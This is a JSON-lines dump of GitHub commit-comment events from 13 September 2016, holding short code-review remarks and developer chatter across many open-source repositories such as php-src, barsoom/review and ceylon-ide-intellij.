{"id":"4554892705","type":"CommitCommentEvent","actor":{"login":"martbhell"},"repo":{"name":"CSC-IT-Center-for-Science/ansible-role-users"},"payload":{"comment":{"id":18999645,"position":null,"line":null,"path":null,"commit_id":"b47fb2767f720d56f462028dc7bcf355f6f0c1c5","created_at":"2016-09-13T11:04:05Z","updated_at":"2016-09-13T11:04:05Z","body":"After #14 I say we owe eachother a beer :)"}},"created_at":"2016-09-13T11:04:05Z"}
{"id":"4554893345","type":"CommitCommentEvent","actor":{"login":"sndnvaps"},"repo":{"name":"multirom-aries/android_device_xiaomi_aries"},"payload":{"comment":{"id":18999646,"position":null,"line":null,"path":null,"commit_id":"6ece8e7c198afe8df5fe402eff35e98109a94677","created_at":"2016-09-13T11:04:14Z","updated_at":"2016-09-13T11:04:14Z","body":"@werty100 @akorshun hi bro's , have you use the wechat or QQ. \r\nslack ... \r\n"}},"created_at":"2016-09-13T11:04:14Z"}
{"id":"4554894832","type":"CommitCommentEvent","actor":{"login":"luiges90"},"repo":{"name":"luiges90/ZhongHuaSanGuoZhi"},"payload":{"comment":{"id":18999647,"position":null,"line":null,"path":null,"commit_id":"30cc7659f319520c13ecafc01dec24e8b6753884","created_at":"2016-09-13T11:04:35Z","updated_at":"2016-09-13T11:04:35Z","body":"還正問"}},"created_at":"2016-09-13T11:04:35Z"}
{"id":"4554900265","type":"CommitCommentEvent","actor":{"login":"xarvh"},"repo":{"name":"barsoom/review"},"payload":{"comment":{"id":18999658,"position":7,"line":31,"path":"web/elm/Types.elm","commit_id":"b33bc9f9187b3168949d93a5368fb0783053cf44","created_at":"2016-09-13T11:05:43Z","updated_at":"2016-09-13T11:05:43Z","body":"I would move this inside the `Settings` module."}},"created_at":"2016-09-13T11:05:43Z"}
{"id":"4554903645","type":"CommitCommentEvent","actor":{"login":"dpeca"},"repo":{"name":"serghey-rodin/vesta"},"payload":{"comment":{"id":18999661,"position":null,"line":null,"path":null,"commit_id":"7cc00677e444c2eb0011ca4a554a606ddc3afff0","created_at":"2016-09-13T11:06:30Z","updated_at":"2016-09-13T11:06:30Z","body":"Actually, this can not be fixed - and, luckily - it's not a bug.\r\nCode that I added will fix the thing until next reboot - and then /var/run/clamav will again be under 'root' ownership.\r\nLuckily, ClamAV will just put error in log - it will say that it can't create PID file... but, in SystemD there is no need for PID file - and ClamAV will works fine.\r\nDebian team knows for this - and they refuse to fix it - because fixing can cause new problems in SystemV.\r\n\r\nYou can find full discussion here - https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=767353\r\n\r\nSo, for now, just ignore this error in clamav log."}},"created_at":"2016-09-13T11:06:30Z"}
{"id":"4554904434","type":"CommitCommentEvent","actor":{"login":"werty100"},"repo":{"name":"multirom-aries/android_device_xiaomi_aries"},"payload":{"comment":{"id":18999665,"position":null,"line":null,"path":null,"commit_id":"6ece8e7c198afe8df5fe402eff35e98109a94677","created_at":"2016-09-13T11:06:41Z","updated_at":"2016-09-13T11:06:41Z","body":"@sndnvaps telegram, i used slack but need a team to start a talk\r\n"}},"created_at":"2016-09-13T11:06:41Z"}
{"id":"4554905544","type":"CommitCommentEvent","actor":{"login":"Shinoow"},"repo":{"name":"Shinoow/AbyssalCraft"},"payload":{"comment":{"id":18999666,"position":null,"line":null,"path":null,"commit_id":"22b142bff17090ca9a178a8d8d5ef3eb3fb4d098","created_at":"2016-09-13T11:06:57Z","updated_at":"2016-09-13T11:06:57Z","body":"Whoops, #133 is also fixed here, forgot to tag that one..."}},"created_at":"2016-09-13T11:06:57Z"}
{"id":"4554908552","type":"CommitCommentEvent","actor":{"login":"xarvh"},"repo":{"name":"barsoom/review"},"payload":{"comment":{"id":18999674,"position":5,"line":36,"path":"web/elm/Settings.elm","commit_id":"b33bc9f9187b3168949d93a5368fb0783053cf44","created_at":"2016-09-13T11:07:38Z","updated_at":"2016-09-13T11:07:38Z","body":"You want `view : Model -> Html SettingsMsg` and `, input [ onInput UpdateName2 ] []`\r\nThen, when the parent uses `Settings.view`, it will use `Html.App.map ChangeSettings Settings.view` instead of just `Settings.view`"}},"created_at":"2016-09-13T11:07:38Z"}
{"id":"4554909069","type":"CommitCommentEvent","actor":{"login":"gergelypap"},"repo":{"name":"brainsum/paragraphs"},"payload":{"comment":{"id":18999676,"position":null,"line":null,"path":null,"commit_id":"29ea4919590a22ca9a85a194a2449babda98c13f","created_at":"2016-09-13T11:07:46Z","updated_at":"2016-09-13T11:07:46Z","body":"@szatom Check this out!\r\n\r\nIt threw a notice in `/admin/reports/dblog`:\r\n`Notice: Trying to get property of non-object in tieto_admin_preprocess_field() (line 189 of /var/www/paragraphs.brainsum.com/themes/tieto_admin/tieto_admin.theme).`\r\n"}},"created_at":"2016-09-13T11:07:46Z"}
{"id":"4554911096","type":"CommitCommentEvent","actor":{"login":"Bauuuuu"},"repo":{"name":"Bauuuuu/android_kernel_zte_nx512j"},"payload":{"comment":{"id":18999680,"position":null,"line":null,"path":null,"commit_id":"0d05ff40732dcb84424e8eadb681ec7a28d5d0de","created_at":"2016-09-13T11:08:16Z","updated_at":"2016-09-13T11:08:16Z","body":"in logcat it gives an error .. i dont remember now"}},"created_at":"2016-09-13T11:08:16Z"}
{"id":"4554912217","type":"CommitCommentEvent","actor":{"login":"rapperskull"},"repo":{"name":"opengapps/opengapps"},"payload":{"comment":{"id":18999681,"position":null,"line":null,"path":null,"commit_id":"9655bb7afe345802a5e33b5d2f2cbb4d3306141b","created_at":"2016-09-13T11:08:32Z","updated_at":"2016-09-13T11:08:32Z","body":"The latest version of Ears (the one included in the package, not the one on the Play Store) is just a nice shortcut for the Google App music search (4x1 widget instead of the 1x1 included in the Google App) and does not provide sound search for itself. Maybe we can keep it in the super package as a nice addition?"}},"created_at":"2016-09-13T11:08:32Z"}
{"id":"4554912533","type":"CommitCommentEvent","actor":{"login":"galaxy119"},"repo":{"name":"DianeOfTheMoon/Roth_UI"},"payload":{"comment":{"id":18999683,"position":null,"line":null,"path":null,"commit_id":"ba13423999854a473923b184c290f1d4a64bc558","created_at":"2016-09-13T11:08:36Z","updated_at":"2016-09-13T11:08:36Z","body":"Why remove mainmenu.lua? Just curious, I did want to work on skinning existing UI frames aswell, game menu was just where I started then I ran out of time before my move schedule to continue."}},"created_at":"2016-09-13T11:08:36Z"}
{"id":"4554914182","type":"CommitCommentEvent","actor":{"login":"cdv-dev"},"repo":{"name":"DimaKhaver/Android-timer"},"payload":{"comment":{"id":18999688,"position":41,"line":41,"path":"app/src/main/res/layout/activity_main.xml","commit_id":"bca67b25bf4df896af1c0995fdfe6212eec4eb5b","created_at":"2016-09-13T11:09:01Z","updated_at":"2016-09-13T11:09:01Z","body":"Always move the text into strings.xml"}},"created_at":"2016-09-13T11:09:01Z"}
{"id":"4554915159","type":"CommitCommentEvent","actor":{"login":"xarvh"},"repo":{"name":"barsoom/review"},"payload":{"comment":{"id":18999689,"position":10,"line":71,"path":"web/elm/Update.elm","commit_id":"b33bc9f9187b3168949d93a5368fb0783053cf44","created_at":"2016-09-13T11:09:17Z","updated_at":"2016-09-13T11:09:17Z","body":"Let this also live inside `Settings`."}},"created_at":"2016-09-13T11:09:17Z"}
{"id":"4554915388","type":"CommitCommentEvent","actor":{"login":"pczarn"},"repo":{"name":"pczarn/gameroom-task"},"payload":{"comment":{"id":18999690,"position":5,"line":10,"path":"spec/factories/teams.rb","commit_id":"8f25cee5eb16ad667951cb942a41530e9a69b85e","created_at":"2016-09-13T11:09:20Z","updated_at":"2016-09-13T11:09:20Z","body":"here, I'm trying to let tests set members. Without this, `team.members` are overwritten on the next line. I can remove this and set members in `before` in tests"}},"created_at":"2016-09-13T11:09:20Z"}
{"id":"4554916083","type":"CommitCommentEvent","actor":{"login":"pczarn"},"repo":{"name":"pczarn/gameroom-task"},"payload":{"comment":{"id":18999693,"position":5,"line":20,"path":"spec/models/team_spec.rb","commit_id":"8f25cee5eb16ad667951cb942a41530e9a69b85e","created_at":"2016-09-13T11:09:31Z","updated_at":"2016-09-13T11:09:31Z","body":"this looks bad"}},"created_at":"2016-09-13T11:09:31Z"}
{"id":"4554917149","type":"CommitCommentEvent","actor":{"login":"nikic"},"repo":{"name":"php/php-src"},"payload":{"comment":{"id":18999694,"position":4,"line":185,"path":"Zend/zend_object_handlers.c","commit_id":"2d8ab51576695630a7471ff829cc5ea10becdc0f","created_at":"2016-09-13T11:09:46Z","updated_at":"2016-09-13T11:09:46Z","body":"Is this really the right fix? Imho it should be the other way around, keep the exception, drop the error. I believe NULL is an accepted return value for get_debug_info."}},"created_at":"2016-09-13T11:09:46Z"}
{"id":"4554918432","type":"CommitCommentEvent","actor":{"login":"JoelZhu"},"repo":{"name":"JoelZhu/WorldofWarships-Android"},"payload":{"comment":{"id":18999697,"position":null,"line":null,"path":null,"commit_id":"ffe6bef2d4dbe2e99e62a82dc7c29925f259e82c","created_at":"2016-09-13T11:10:07Z","updated_at":"2016-09-13T11:10:07Z","body":"#3 "}},"created_at":"2016-09-13T11:10:07Z"}
{"id":"4554921183","type":"CommitCommentEvent","actor":{"login":"JoelZhu"},"repo":{"name":"JoelZhu/WorldofWarships-Android"},"payload":{"comment":{"id":18999700,"position":null,"line":null,"path":null,"commit_id":"030f29f868f7c7a8040f2df0bf87d8b0dc81d029","created_at":"2016-09-13T11:10:46Z","updated_at":"2016-09-13T11:10:46Z","body":"#3 "}},"created_at":"2016-09-13T11:10:46Z"}
{"id":"4554922937","type":"CommitCommentEvent","actor":{"login":"JoelZhu"},"repo":{"name":"JoelZhu/WorldofWarships-Android"},"payload":{"comment":{"id":18999705,"position":null,"line":null,"path":null,"commit_id":"3c118267670848df81d41a75e890936af2782fa4","created_at":"2016-09-13T11:11:13Z","updated_at":"2016-09-13T11:11:13Z","body":"#3 "}},"created_at":"2016-09-13T11:11:13Z"}
{"id":"4554923636","type":"CommitCommentEvent","actor":{"login":"karasevb"},"repo":{"name":"karasevb/master"},"payload":{"comment":{"id":18999708,"position":99,"line":514,"path":"src/dstore/pmix_esh.c","commit_id":"782773100b9a4efc2a6292d11fc7a39f447a4a83","created_at":"2016-09-13T11:11:22Z","updated_at":"2016-09-13T11:11:22Z","body":"below - out of resource"}},"created_at":"2016-09-13T11:11:22Z"}
{"id":"4554923949","type":"CommitCommentEvent","actor":{"login":"Ralf9"},"repo":{"name":"RFD-FHEM/RFFHEM"},"payload":{"comment":{"id":18999711,"position":5,"line":22,"path":"FHEM/14_SD_WS.pm","commit_id":"7c15b54258fef1bb0139322c5804e9fccd873c77","created_at":"2016-09-13T11:11:26Z","updated_at":"2016-09-13T11:11:26Z","body":"Wenn beim SD_WS Modul für die Protokolle anstatt dem P ein W verwendet wird, dann müssen die IDs nicht in die Regex aufgenommen werden"}},"created_at":"2016-09-13T11:11:26Z"}
{"id":"4554929601","type":"CommitCommentEvent","actor":{"login":"pedrobaeza"},"repo":{"name":"OCA/social"},"payload":{"comment":{"id":18999723,"position":31,"line":61,"path":"mail_tracking/models/mail_message.py","commit_id":"333d28a41c8a949b4c151a9a59efe2d196d49382","created_at":"2016-09-13T11:12:48Z","updated_at":"2016-09-13T11:12:48Z","body":"s/there is/there are"}},"created_at":"2016-09-13T11:12:48Z"}
{"id":"4554930029","type":"CommitCommentEvent","actor":{"login":"FrancescVargas"},"repo":{"name":"FrancescVargas/entrenador"},"payload":{"comment":{"id":18999725,"position":null,"line":null,"path":null,"commit_id":"1618b91f099066b13518e9d81168f16749db8117","created_at":"2016-09-13T11:12:55Z","updated_at":"2016-09-13T11:12:55Z","body":"2 respostes de cada una de les 4 preguntes (1 per cadascun dels 4 temes)"}},"created_at":"2016-09-13T11:12:55Z"}
{"id":"4554934716","type":"CommitCommentEvent","actor":{"login":"pedrobaeza"},"repo":{"name":"OCA/social"},"payload":{"comment":{"id":18999732,"position":null,"line":null,"path":null,"commit_id":"ee76f1adcbf4d3a07f764f22442a79245e766088","created_at":"2016-09-13T11:14:00Z","updated_at":"2016-09-13T11:14:00Z","body":"Why do you need this?"}},"created_at":"2016-09-13T11:14:00Z"}
{"id":"4554938395","type":"CommitCommentEvent","actor":{"login":"tmtmtmtm"},"repo":{"name":"everypolitician/everypolitician-popolo"},"payload":{"comment":{"id":18999738,"position":27,"line":10,"path":"lib/everypolitician/popolo/event.rb","commit_id":"1304ab4219c185f9df05e5e845446522966f2237","created_at":"2016-09-13T11:14:53Z","updated_at":"2016-09-13T11:14:53Z","body":"I don't think there's anything to be gained from memoizing all these, is there?"}},"created_at":"2016-09-13T11:14:53Z"}
{"id":"4554946867","type":"CommitCommentEvent","actor":{"login":"anishdcruz"},"repo":{"name":"laravel/laravel"},"payload":{"comment":{"id":18999755,"position":null,"line":null,"path":null,"commit_id":"6dfc0229b2f4ec4d72bf7361d7e81ff62e5d4b5e","created_at":"2016-09-13T11:16:45Z","updated_at":"2016-09-13T11:16:45Z","body":"Hi @JosephSilber,\r\nSince the auth middleware is in the core. How can i add custom redirect ?\r\n\r\nFor example:\r\n\r\n`return redirect()->guest('login');`\r\n\r\nto \r\n\r\n`return redirect()->guest('session/new');`\r\n\r\nthanks"}},"created_at":"2016-09-13T11:16:45Z"}
{"id":"4554947995","type":"CommitCommentEvent","actor":{"login":"kejmil01"},"repo":{"name":"kejmil01/gitbranchtesting"},"payload":{"comment":{"id":18999756,"position":null,"line":null,"path":null,"commit_id":"f6016fbc1e82c4f196ac71390fe943bc5755dbb8","created_at":"2016-09-13T11:17:07Z","updated_at":"2016-09-13T11:17:07Z","body":"#Pull Request"}},"created_at":"2016-09-13T11:17:07Z"}
{"id":"4554950121","type":"CommitCommentEvent","actor":{"login":"dipak-pawar"},"repo":{"name":"dipak-pawar/arquillian-governor"},"payload":{"comment":{"id":18999761,"position":49,"line":49,"path":"jira/src/main/java/org/arquillian/extension/governor/jira/impl/reporter/JiraGovernorRecorder.java","commit_id":"ba02922583759336796b8dfd93d327be8a695373","created_at":"2016-09-13T11:17:35Z","updated_at":"2016-09-13T11:17:35Z","body":"@lordofthejars , I was also thinking for same logic but when I looked around JiraTestExecutionDecider.java Code. I haven't found how order is extracting for Issue? I found method is picking from governorRegistry in which method is ready with class annotation if method doesn't have @Jira annotation."}},"created_at":"2016-09-13T11:17:35Z"}
{"id":"4554952167","type":"CommitCommentEvent","actor":{"login":"jakzal"},"repo":{"name":"php/php-src"},"payload":{"comment":{"id":18999766,"position":72,"line":72,"path":"ext/filter/tests/filter_ipv4_rfc6890.phpt","commit_id":"6fc7817558db2016b160277e410381f286fe127a","created_at":"2016-09-13T11:18:03Z","updated_at":"2016-09-13T11:18:03Z","body":"Shouldn't the first array element be `240.0.0.0` instead of `224.0.0.0` ?"}},"created_at":"2016-09-13T11:18:03Z"}
{"id":"4554954428","type":"CommitCommentEvent","actor":{"login":"yasserShawish"},"repo":{"name":"yasserShawish/phpProject"},"payload":{"comment":{"id":18999769,"position":null,"line":null,"path":null,"commit_id":"94a473f7647cf6be4704639288904bbfc8e7f4d6","created_at":"2016-09-13T11:18:35Z","updated_at":"2016-09-13T11:18:35Z","body":"my baby :3\r\n"}},"created_at":"2016-09-13T11:18:35Z"}
{"id":"4554955457","type":"CommitCommentEvent","actor":{"login":"maurofmferrao"},"repo":{"name":"maurofmferrao/xibo-cms"},"payload":{"comment":{"id":18999773,"position":null,"line":null,"path":null,"commit_id":"203b85eb8f1cf2cbb029105ea033959e93259171","created_at":"2016-09-13T11:18:51Z","updated_at":"2016-09-13T11:18:51Z","body":"@dasgarner I've found that the schedule/form/edit is not working, so I have to put some conditions on the remove and add \"href\" lines."}},"created_at":"2016-09-13T11:18:51Z"}
{"id":"4554956248","type":"CommitCommentEvent","actor":{"login":"CuteLeon"},"repo":{"name":"CuteLeon/PreySilent"},"payload":{"comment":{"id":18999778,"position":null,"line":null,"path":null,"commit_id":"150ab0ff246996211eaf4d7f8b383eb70b42fb64","created_at":"2016-09-13T11:19:02Z","updated_at":"2016-09-13T11:19:02Z","body":"当判断 \\alert\\win32\\flash.exe 文件存在时，会删除文件，而不是跳过回复，也可以利用该特性，进行 flash.exe 的更新"}},"created_at":"2016-09-13T11:19:02Z"}
{"id":"4554957343","type":"CommitCommentEvent","actor":{"login":"codingforfun"},"repo":{"name":"OCA/OCB"},"payload":{"comment":{"id":18999782,"position":null,"line":null,"path":null,"commit_id":"a7dc3e17066274763d890d2b19bfa823091fdc0c","created_at":"2016-09-13T11:19:16Z","updated_at":"2016-09-13T11:19:16Z","body":"@hbrunn @petrus-v \r\nThe 7.0 branch is failing on Travis since 5+ months. \r\nFirst failing build is https://travis-ci.org/OCA/OCB/builds/121219493\r\nFailing on the commit above (a7dc3e17066274763d890d2b19bfa823091fdc0c) \r\n\r\nSince you both are mentioned as author/commiter I kindly ask you if you could please check this. \r\n\r\nLast working build before seams to be https://travis-ci.org/OCA/OCB/builds/120348200 on f97227f4025896c9916cbf2155fbde3fb1306d29"}},"created_at":"2016-09-13T11:19:16Z"}
{"id":"4554963442","type":"CommitCommentEvent","actor":{"login":"Bladewood"},"repo":{"name":"endless-sky/endless-sky"},"payload":{"comment":{"id":18999797,"position":null,"line":null,"path":null,"commit_id":"ebe3c4ddc9719df12e83fb7897c31e269b6410ab","created_at":"2016-09-13T11:20:38Z","updated_at":"2016-09-13T11:20:38Z","body":"yay"}},"created_at":"2016-09-13T11:20:38Z"}
{"id":"4554965290","type":"CommitCommentEvent","actor":{"login":"naomipol"},"repo":{"name":"shulamyt/shareMyBooks"},"payload":{"comment":{"id":18999800,"position":8,"line":6,"path":"server/rest/bookRest.js","commit_id":"dfd3793e578c50a5be86bbb2f3db85ff71a2ea0d","created_at":"2016-09-13T11:21:05Z","updated_at":"2016-09-13T11:21:05Z","body":"should be `'/books/:id'`"}},"created_at":"2016-09-13T11:21:05Z"}
{"id":"4554966650","type":"CommitCommentEvent","actor":{"login":"JamesCullum"},"repo":{"name":"antigloss/go"},"payload":{"comment":{"id":18999809,"position":null,"line":null,"path":null,"commit_id":"246be9c619517216ebff72a92c48d71ef722ad9b","created_at":"2016-09-13T11:21:25Z","updated_at":"2016-09-13T11:21:25Z","body":"Oh youre right, i didnt see that it always returns a slice, i thought it will give an error if it does not exist."}},"created_at":"2016-09-13T11:21:25Z"}
{"id":"4554967719","type":"CommitCommentEvent","actor":{"login":"freemanoid"},"repo":{"name":"collectiveidea/audited"},"payload":{"comment":{"id":18999816,"position":null,"line":null,"path":null,"commit_id":"45fbed2ba0f178e38e713fa8dfea6259d3a2cab1","created_at":"2016-09-13T11:21:39Z","updated_at":"2016-09-13T11:21:39Z","body":"@paneer-tikka is https://github.com/collectiveidea/audited/blob/master/audited.gemspec#L21 not enought?"}},"created_at":"2016-09-13T11:21:39Z"}
{"id":"4554967867","type":"CommitCommentEvent","actor":{"login":"demoneaux"},"repo":{"name":"feross/webtorrent-desktop"},"payload":{"comment":{"id":18999817,"position":38,"line":51,"path":"src/main/external-player.js","commit_id":"3a4906079bed4050396d78982963128ca511d1f3","created_at":"2016-09-13T11:21:41Z","updated_at":"2016-09-13T11:21:41Z","body":"Should there be a check for `process.platform === 'darwin'`?"}},"created_at":"2016-09-13T11:21:41Z"}
{"id":"4554970636","type":"CommitCommentEvent","actor":{"login":"valexiev"},"repo":{"name":"vitalets/angular-xeditable"},"payload":{"comment":{"id":18999819,"position":5,"line":7,"path":"src/css/xeditable.css","commit_id":"292754e6be3c003ad16252a179f7ebb17aab2097","created_at":"2016-09-13T11:22:21Z","updated_at":"2016-09-13T11:22:21Z","body":"That breaks the style of the datepicker. You can see it on the demo page."}},"created_at":"2016-09-13T11:22:21Z"}
{"id":"4554973388","type":"CommitCommentEvent","actor":{"login":"Shnoulle"},"repo":{"name":"Shnoulle/LimeSurvey-Shnoulle"},"payload":{"comment":{"id":18999831,"position":4,"line":14,"path":"application/views/survey/questions/arrays/5point/answer.php","commit_id":"ef288b91e117e90551d78cbb35ce851dfa579b16","created_at":"2016-09-13T11:22:59Z","updated_at":"2016-09-13T11:22:59Z","body":"I remove it now. ANd i think i remove it too the 'no-more-tables' from core views. Template can add it in question.pstpl in {ANSWERS} wrapper"}},"created_at":"2016-09-13T11:22:59Z"}
{"id":"4554974336","type":"CommitCommentEvent","actor":{"login":"dipak-pawar"},"repo":{"name":"dipak-pawar/arquillian-governor"},"payload":{"comment":{"id":18999833,"position":7,"line":112,"path":"jira/pom.xml","commit_id":"ba02922583759336796b8dfd93d327be8a695373","created_at":"2016-09-13T11:23:12Z","updated_at":"2016-09-13T11:23:12Z","body":"@lordofthejars, I think user will add \"arquillian-recorder-reporter-impl\" dependency runtime by adding it in pom.xml to his/her test project. Do we need to update spi & api as provided?"}},"created_at":"2016-09-13T11:23:12Z"}
{"id":"4554976637","type":"CommitCommentEvent","actor":{"login":"jegger"},"repo":{"name":"allestuetsmerweh/garden.cefpython"},"payload":{"comment":{"id":18999843,"position":null,"line":null,"path":null,"commit_id":"cb2dc06bfe0a630b16d7876518429bef08ece7e2","created_at":"2016-09-13T11:23:43Z","updated_at":"2016-09-13T11:23:43Z","body":"It is available in this branch: https://github.com/jegger/kivy/tree/xinput2_window"}},"created_at":"2016-09-13T11:23:43Z"}
{"id":"4554976667","type":"CommitCommentEvent","actor":{"login":"Shnoulle"},"repo":{"name":"Shnoulle/LimeSurvey-Shnoulle"},"payload":{"comment":{"id":18999844,"position":42,"line":42,"path":"templates/base_awesome/css/template-core.css","commit_id":"ef288b91e117e90551d78cbb35ce851dfa579b16","created_at":"2016-09-13T11:23:44Z","updated_at":"2016-09-13T11:23:44Z","body":"Todo .... :)"}},"created_at":"2016-09-13T11:23:44Z"}
{"id":"4554978038","type":"CommitCommentEvent","actor":{"login":"sndnvaps"},"repo":{"name":"multirom-aries/android_device_xiaomi_aries"},"payload":{"comment":{"id":18999847,"position":null,"line":null,"path":null,"commit_id":"6ece8e7c198afe8df5fe402eff35e98109a94677","created_at":"2016-09-13T11:24:05Z","updated_at":"2016-09-13T11:24:05Z","body":"great ,i have join the EFIDroid team now .. i can create a new team now .. \r\n\r\nhttps://aries-dev.slack.com/\r\n@werty100 @akorshun "}},"created_at":"2016-09-13T11:24:05Z"}
{"id":"4554982569","type":"CommitCommentEvent","actor":{"login":"MikuAuahDark"},"repo":{"name":"MikuAuahDark/NPPS"},"payload":{"comment":{"id":18999856,"position":null,"line":null,"path":null,"commit_id":"b86dfb7cd10a05c268173183d03916763078924e","created_at":"2016-09-13T11:25:08Z","updated_at":"2016-09-13T11:25:08Z","body":"Are you sure that you copied the `data` correctly?"}},"created_at":"2016-09-13T11:25:08Z"}
{"id":"4554984529","type":"CommitCommentEvent","actor":{"login":"cjfields"},"repo":{"name":"bioperl/bioperl-live"},"payload":{"comment":{"id":18999860,"position":null,"line":null,"path":null,"commit_id":"e5023eef64adfb4e41598670c14d4e99789ea37c","created_at":"2016-09-13T11:25:33Z","updated_at":"2016-09-13T11:25:33Z","body":"Sure, it's pretty simple to pull this across"}},"created_at":"2016-09-13T11:25:33Z"}
{"id":"4554986790","type":"CommitCommentEvent","actor":{"login":"davidfestal"},"repo":{"name":"ceylon/ceylon-ide-intellij"},"payload":{"comment":{"id":18999869,"position":6,"line":32,"path":"plugin-ceylon-code/source/org/intellij/plugins/ceylon/ide/ceylonCode/platform/ideaPlatformUtils.ceylon","commit_id":"886d192a680f8ec62f0e32353fcb831abd555ab2","created_at":"2016-09-13T11:26:03Z","updated_at":"2016-09-13T11:26:03Z","body":"why don't you simply use `e.string` instead of calling the `classname` function which might take time?"}},"created_at":"2016-09-13T11:26:03Z"}
{"id":"4554987786","type":"CommitCommentEvent","actor":{"login":"dchote"},"repo":{"name":"timshannon/go-openal"},"payload":{"comment":{"id":18999870,"position":null,"line":null,"path":null,"commit_id":"0a4cd0b7cd71bd1dba4e40e7010f96ee49eb80b0","created_at":"2016-09-13T11:26:17Z","updated_at":"2016-09-13T11:26:17Z","body":"This seems to break in golang 1.3.3 on raspbian jessie, have been using this successfully before this pull request.\r\n\r\nsrc/github.com/timshannon/go-openal/openal/alcCore.go:86: cannot use unsafe.Pointer(self.handle) (type unsafe.Pointer) as type *C.struct_ALCdevice_struct in argument to _Cfunc_alcGetError\r\nsrc/github.com/timshannon/go-openal/openal/alcCore.go:121: cannot use unsafe.Pointer(self.handle) (type unsafe.Pointer) as type *C.struct_ALCdevice_struct in argument to _Cfunc_alcCloseDevice\r\nsrc/github.com/timshannon/go-openal/openal/alcCore.go:127: cannot use unsafe.Pointer(self.handle) (type unsafe.Pointer) as type *C.struct_ALCdevice_struct in argument to _Cfunc_alcCreateContext\r\nsrc/github.com/timshannon/go-openal/openal/alcCore.go:132: cannot use unsafe.Pointer(self.handle) (type unsafe.Pointer) as type *C.struct_ALCdevice_struct in argument to _Cfunc_walcGetIntegerv\r\nsrc/github.com/timshannon/go-openal/openal/alcCore.go:137: cannot use unsafe.Pointer(self.handle) (type unsafe.Pointer) as type *C.struct_ALCdevice_struct in argument to _Cfunc_walcGetInteger\r\nsrc/github.com/timshannon/go-openal/openal/alcCore.go:158: cannot use unsafe.Pointer(self.Device.handle) (type unsafe.Pointer) as type *C.struct_ALCdevice_struct in argument to _Cfunc_alcCaptureCloseDevice\r\nsrc/github.com/timshannon/go-openal/openal/alcCore.go:166: cannot use unsafe.Pointer(self.Device.handle) (type unsafe.Pointer) as type *C.struct_ALCdevice_struct in argument to _Cfunc_alcCaptureStart\r\nsrc/github.com/timshannon/go-openal/openal/alcCore.go:170: cannot use unsafe.Pointer(self.Device.handle) (type unsafe.Pointer) as type *C.struct_ALCdevice_struct in argument to _Cfunc_alcCaptureStop\r\nsrc/github.com/timshannon/go-openal/openal/alcCore.go:174: cannot use unsafe.Pointer(self.Device.handle) (type unsafe.Pointer) as type *C.struct_ALCdevice_struct in argument to _Cfunc_alcCaptureSamples\r\nsrc/github.com/timshannon/go-openal/openal/alcCore.go:178: cannot use unsafe.Pointer(self.Device.handle) (type unsafe.Pointer) as type *C.struct_ALCdevice_struct in argument to _Cfunc_alcCaptureSamples\r\nsrc/github.com/timshannon/go-openal/openal/alcCore.go:178: too many errors"}},"created_at":"2016-09-13T11:26:17Z"}
{"id":"4554988696","type":"CommitCommentEvent","actor":{"login":"mullayaasin"},"repo":{"name":"QuickBlox/QMChatViewController-ios"},"payload":{"comment":{"id":18999874,"position":null,"line":null,"path":null,"commit_id":"f3645d3a011926a200d1cc3caf07fdfcbe625614","created_at":"2016-09-13T11:26:28Z","updated_at":"2016-09-13T11:26:28Z","body":"f3645d3"}},"created_at":"2016-09-13T11:26:28Z"}
{"id":"4554990928","type":"CommitCommentEvent","actor":{"login":"mullayaasin"},"repo":{"name":"QuickBlox/QMChatViewController-ios"},"payload":{"comment":{"id":18999879,"position":2,"line":33,"path":"QMChatViewController/Utils/QMImageLoader/QMImageLoader.m","commit_id":"f3645d3a011926a200d1cc3caf07fdfcbe625614","created_at":"2016-09-13T11:26:58Z","updated_at":"2016-09-13T11:26:58Z","body":"f3645d3"}},"created_at":"2016-09-13T11:26:58Z"}
{"id":"4554992292","type":"CommitCommentEvent","actor":{"login":"bjansen"},"repo":{"name":"ceylon/ceylon-ide-intellij"},"payload":{"comment":{"id":18999884,"position":6,"line":32,"path":"plugin-ceylon-code/source/org/intellij/plugins/ceylon/ide/ceylonCode/platform/ideaPlatformUtils.ceylon","commit_id":"886d192a680f8ec62f0e32353fcb831abd555ab2","created_at":"2016-09-13T11:27:16Z","updated_at":"2016-09-13T11:27:16Z","body":"Good idea. Done!"}},"created_at":"2016-09-13T11:27:16Z"}
{"id":"4554994318","type":"CommitCommentEvent","actor":{"login":"ckosloski"},"repo":{"name":"vitalets/angular-xeditable"},"payload":{"comment":{"id":18999890,"position":5,"line":7,"path":"src/css/xeditable.css","commit_id":"292754e6be3c003ad16252a179f7ebb17aab2097","created_at":"2016-09-13T11:27:43Z","updated_at":"2016-09-13T11:27:43Z","body":"Yes, I realize that.  The fix has already been merged in."}},"created_at":"2016-09-13T11:27:43Z"}
{"id":"4554994888","type":"CommitCommentEvent","actor":{"login":"Pro100Andrey"},"repo":{"name":"QuickBlox/QMChatViewController-ios"},"payload":{"comment":{"id":18999891,"position":null,"line":null,"path":null,"commit_id":"f3645d3a011926a200d1cc3caf07fdfcbe625614","created_at":"2016-09-13T11:27:51Z","updated_at":"2016-09-13T11:27:51Z","body":"@mullayaasin  ?"}},"created_at":"2016-09-13T11:27:51Z"}
{"id":"4554995778","type":"CommitCommentEvent","actor":{"login":"xrotwang"},"repo":{"name":"lmaurits/BEASTling"},"payload":{"comment":{"id":18999895,"position":8,"line":39,"path":"beastling/models/basemodel.py","commit_id":"338f73df3ceab0fd8efa318a2bb4b87b2bbad3b8","created_at":"2016-09-13T11:28:04Z","updated_at":"2016-09-13T11:28:04Z","body":"I think this is what broke the tests."}},"created_at":"2016-09-13T11:28:04Z"}
{"id":"4554996868","type":"CommitCommentEvent","actor":{"login":"Bladewood"},"repo":{"name":"endless-sky/endless-sky"},"payload":{"comment":{"id":18999897,"position":null,"line":null,"path":null,"commit_id":"64844efbaa5b197eccc862286ae68d9fc39c6e6c","created_at":"2016-09-13T11:28:19Z","updated_at":"2016-09-13T11:28:19Z","body":"Apparently, wanderer heat sinks > small heat shunt and cooling ducts now.\r\nhuh."}},"created_at":"2016-09-13T11:28:19Z"}
{"id":"4554998647","type":"CommitCommentEvent","actor":{"login":"hellais"},"repo":{"name":"TheTorProject/ooni-web"},"payload":{"comment":{"id":18999899,"position":86,"line":551,"path":"content/install/lepidopter.md","commit_id":"012ed0be5c2554082d3db365793bff5990d97b9c","created_at":"2016-09-13T11:28:42Z","updated_at":"2016-09-13T11:28:42Z","body":"We should put here as the first of the list the lepidopter.local address. Just so the user can go through all of them in order."}},"created_at":"2016-09-13T11:28:42Z"}
